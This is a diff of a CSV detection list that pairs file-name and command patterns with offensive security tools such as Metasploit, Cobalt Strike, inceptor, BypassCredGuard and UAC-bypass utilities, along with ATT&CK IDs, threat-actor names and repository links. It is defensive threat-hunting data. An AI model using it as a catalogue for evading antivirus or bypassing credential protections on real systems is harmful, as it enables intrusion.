+"*burpitem.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burplog.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*BurpShiroPassiveScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*burpstate.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burpstate.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*Burpsuite*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. 
This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.exe*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.jar*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -8085,58 +8232,58 @@ "*burpsuite*.zip*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpSuiteCn.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*BurpSuiteHTTPSmuggler*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" -"*BurpSuite-SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*BurpSuite-SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - 
TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*burp-vulners-scanner-*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp-xss-sql-plugin*","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","N/A","1","44","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z" "*buster -e * -f john -l doe -b '****1989'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*busterPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*busterPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*bWV0YXNwbG9pdA==*","offensive_tool_keyword","C2 
related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*byakugan/bin/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*byakugan/bin/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Bye_Explorer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*BYOVD_kill_av_edr.*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"*bypass_cmdinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypass_powershell_protections*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Bypass-4MSI*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*bypass-amsi*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*BYOVD_kill_av_edr.*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*bypass_cmdinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypass_powershell_protections*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Bypass-4MSI*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. 
Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*bypass-amsi*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*BypassAV.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" -"*bypass-classic.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*bypass-classic.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*BypassCredGuard.*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*BypassCredGuard-master*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" -"*BYPASS-DINVOKE*.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*BYPASS-DINVOKE.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE*.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*bypass-pipe.c*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*bypass-powershell.ps1*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*bypass-powershell.ps1*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*BypassUAC *.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*bypassuac fodhelper*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Bypass-UAC*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*bypassUAC*.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*bypassUAC*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*--bypass-uac*--logontype*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*bypassuac_comhijack.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_comhijack.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
